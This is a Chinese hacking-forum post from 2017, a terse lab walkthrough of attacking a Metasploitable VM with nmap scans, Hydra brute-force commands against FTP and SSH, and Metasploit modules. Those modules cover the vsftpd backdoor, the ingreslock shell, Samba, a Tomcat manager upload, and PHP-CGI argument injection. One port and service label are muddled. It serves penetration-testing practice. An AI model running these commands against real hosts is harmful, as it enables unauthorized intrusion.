黑帽联盟
标题: kali渗透metasploitable靶机 [打印本页]
作者: yun 时间: 2017-4-10 00:25
标题: kali渗透metasploitable靶机
扫描阶段:
工具:Nmap
隐蔽扫描 nmap -sS 192.168.8.135
端口爆破:FTP、SSH等
工具:Hydra
备用字典
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.8.135
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.8.135 ssh
登陆系统:
端口渗透:
利用metasploit
成功获取会话,root权限
- 6200——-vsftpd_234_backdoor
利用metasploit
反弹会话,root权限
- 1524——-ingrelock_backdoor
利用telnet连接1524,直接返回root会话
- 1099——-distcc程序漏洞—-ingrelock
利用metasploit
返回会话
先用nmap进行详细扫描
nmap -v -A -T4 192.168.8.135
Samba 3.0.20
利用metasploit
返回会话,root权限
使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破
用默认自带的字典即可
爆破出tomcat/tomcat
使用use exploit/multi/http/tomcat_mgr_upload模块
获取meterpreter会话
msf > search cve:2012-1823
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135
rhost => 192.168.8.135
msf exploit(php_cgi_arg_injection) > run
欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) |
Powered by Discuz! X2.5 |